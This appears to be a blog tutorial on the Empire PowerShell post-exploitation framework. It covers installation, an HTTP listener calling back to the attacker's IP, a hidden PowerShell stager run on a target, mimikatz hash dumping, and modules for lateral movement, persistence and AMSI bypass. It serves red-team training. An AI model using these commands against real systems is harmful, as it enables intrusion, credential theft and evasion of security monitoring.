Empire: A Comprehensive Red Teaming Framework Built on PowerShell

Hello, fellow hackers, pen testers, and security enthusiasts! As a professional hacker, I am thrilled to bring you a comprehensive dive into the world of Empire, a powerful and versatile red teaming framework built on PowerShell. Empire is an open-source, post-exploitation framework for those unfamiliar, offering various modules, tools, and techniques to exploit and control compromised systems. This article will dive deep into Empire, exploring its features, capabilities, and real-world examples to help you level up your pen testing and red teaming game.

Let’s get started!

Overview of Empire

Empire is a PowerShell-based framework primarily focused on Windows environments, but it also offers some capabilities for targeting macOS and Linux systems. Developed by the team at BC Security, Empire is designed to help you evade detection, exfiltrate data, and maintain control over compromised systems.

Its heavy reliance on PowerShell, the powerful scripting language and automation engine built into Windows, sets Empire apart from other frameworks. By leveraging PowerShell, Empire can bypass many traditional security measures, such as antivirus software and intrusion detection systems (IDS), making it an invaluable tool for pen testers and red teamers.

Setting Up Empire

To begin, you will need to install Empire on your attack machine. Empire is compatible with Windows, macOS, and Linux systems. For this article, we will focus on installing Empire on a Kali Linux machine, a popular choice for pen testers and red teamers. To install Empire on Kali Linux, follow these steps:

1. Update your Kali Linux machine:

   sudo apt-get update && sudo apt-get upgrade -y
   

2. Clone the Empire repository from GitHub:

   git clone https://github.com/BC-SECURITY/Empire.git
   

3. Change to the Empire directory:

   cd Empire
   

4. Run the setup script:

   sudo ./setup/install.sh
   

5. Start Empire:

   sudo ./empire
   

With Empire installed and running, you are ready to explore its capabilities and modules.

Empire Architecture

Before diving into specific modules and techniques, it’s essential to understand the underlying architecture of Empire. The framework has three core components: the server, listeners, and agents.

• Server: The server is the heart of Empire, responsible for managing listeners, agents, and modules. It provides a web-based and command-line interface for managing and controlling the framework.
• Listeners: Listeners are the communication channels between the Empire server and agents. Empire supports various listener types, including HTTP, HTTPS, and DNS. Listeners are responsible for handling incoming connections from agents and routing commands and data between the server and agents.
• Agents: Agents are the payloads that execute on compromised systems. They are responsible for carrying out the commands and modules sent from the Empire server. Empire agents are primarily PowerShell-based but can be written in Python or other scripting languages.

Setting Up a Listener

Before exploiting and controlling systems with Empire, you must set up a listener to handle communication with your agents. Empire supports several listener types, including HTTP, HTTPS, and DNS. For this example, we will set up an HTTP listener.

1. Start Empire, if you haven’t already:

   sudo ./empire
   

2. Create a new HTTP listener:

   (Empire) > listeners
   (Empire: listeners) > uselistener http
   

3. Set the listener’s options:

   (Empire: listeners/http) > set Host http://<your-external-ip>:8080
   (Empire: listeners/http) > set Port 8080
   

   Replace <your-external-ip> with the external IP address of your attack machine.

4. Start the listener:

   (Empire: listeners/http) > execute
   

Your HTTP listener is now running and ready to handle incoming connections from agents.

Generating a Stager

Once you set up a listener, the next step is to generate a stager to deploy on the target system. Stagers are small, initial payloads that establish a connection to the listener and download the full Empire agent. Empire offers a variety of stager types, including PowerShell, VBA macros, and HTA files.

For this example, we will generate a PowerShell stager for our HTTP listener.

1. Create a new PowerShell stager:

   (Empire) > usestager windows/launcher_bat
   

2. Set the stager’s options:

   (Empire: stager/windows/launcher_bat) > set Listener http
   

3. Generate the stager:

   (Empire: stager/windows/launcher_bat) > generate
   

This command will output the PowerShell stager code, which you can save to a file or copy to your clipboard for deployment on the target system.

Deploying the Stager and Establishing Control

With the stager generated, the next step is to deploy it on the target system. There are many ways to deliver a stager, such as via phishing emails, malicious websites, or lateral movement within a network. For this example, let’s assume you have gained access to a target system through another vulnerability or social engineering attack and can execute the stager directly.

1. On the target system, open a PowerShell prompt and execute the stager code:

   powershell -nop -w hidden -c "<stager-code>"
   

   Replace <stager-code> with the code generated in the previous section.

2. Back in Empire, you should see a new agent connection:

   (Empire) > agents
   

3. Interact with the agent:

   (Empire) > interact <agent-name>
   

   Replace <agent-name> with the name of the connected agent.

You can now control the target system and execute commands and modules through the Empire agent.

Exploring Empire Modules

Empire offers many modules to help you exploit and control compromised systems. These modules can perform various tasks, such as escalating privileges, exfiltrating data, and evading detection. To explore the available modules, use the searchmodule command:

(Empire) > searchmodule

To use a specific module, enter the following command:

(Empire) > usemodule <module-name>

Replace <module-name> with the name of the module you want to use.

For example, you want to dump the password hashes from the target system. You can use the mimikatz/samdump_hashes module to achieve this:

1. Load the mimikatz/samdump_hashes module:

   (Empire) > usemodule credentials/mimikatz/samdump_hashes
   

2. Set the agent for the module:

   (Empire: credentials/mimikatz/samdump_hashes) > set Agent <agent-name>
   

   Replace <agent-name> with the name of your connected agent.

3. Execute the module:

   (Empire: credentials/mimikatz/samdump_hashes) > execute
   

The module will execute on the target system, and the password hashes will be returned to the Empire server.

Empire offers many more modules for various purposes, such as lateral movement, persistence, and evasion. Here are some popular modules and their use cases:

• Privilege Escalation: powershell/privesc/powerup

  This module leverages the PowerUp script to identify potential privilege escalation vectors on the target system.

• Lateral Movement: powershell/lateral_movement/invoke_wmi

  This module uses WMI to execute a payload on a remote system within the same network.

• Persistence: powershell/persistence/elevated/wmi

  This module establishes persistence on the target system by creating a WMI event subscription.

• Evasion: powershell/management/amsi_bypass

  This module bypasses AMSI (Anti-Malware Scan Interface) to evade detection by antivirus software.

Real-World Examples

Empire has been used in various high-profile attacks and real-world penetration tests. Let’s discuss a couple of real-world examples to illustrate Empire’s capabilities:

• APT34 (aka OilRig): APT34 is a nation-state advanced persistent threat (APT) group attributed to Iran. The group has been known to use Empire as part of its toolset for cyber espionage operations targeting critical infrastructure, financial institutions, and government organizations. Empire was used to maintain access to compromised systems and exfiltrate sensitive data.
• A large-scale red team exercise: In this example, a red team used Empire during a simulated attack on a corporate network. The team gained initial access to the network through a phishing campaign that delivered an Empire stager via a malicious macro in a Word document. Once inside the network, the team used Empire modules to escalate privileges, move laterally, and establish persistence. The exercise helped the organization identify and remediate security gaps in its infrastructure.

Conclusion

Empire is a powerful and versatile red teaming framework built on PowerShell. With its wide range of modules, tools, and techniques, Empire is invaluable for pen testers and red teamers looking to exploit and control compromised systems. By understanding and leveraging Empire’s capabilities, you can level up your pen testing and red teaming game, ultimately helping identify and remediate security vulnerabilities in your target systems.

Always use tools like Empire responsibly and only for ethical hacking and security testing purposes. Happy hacking!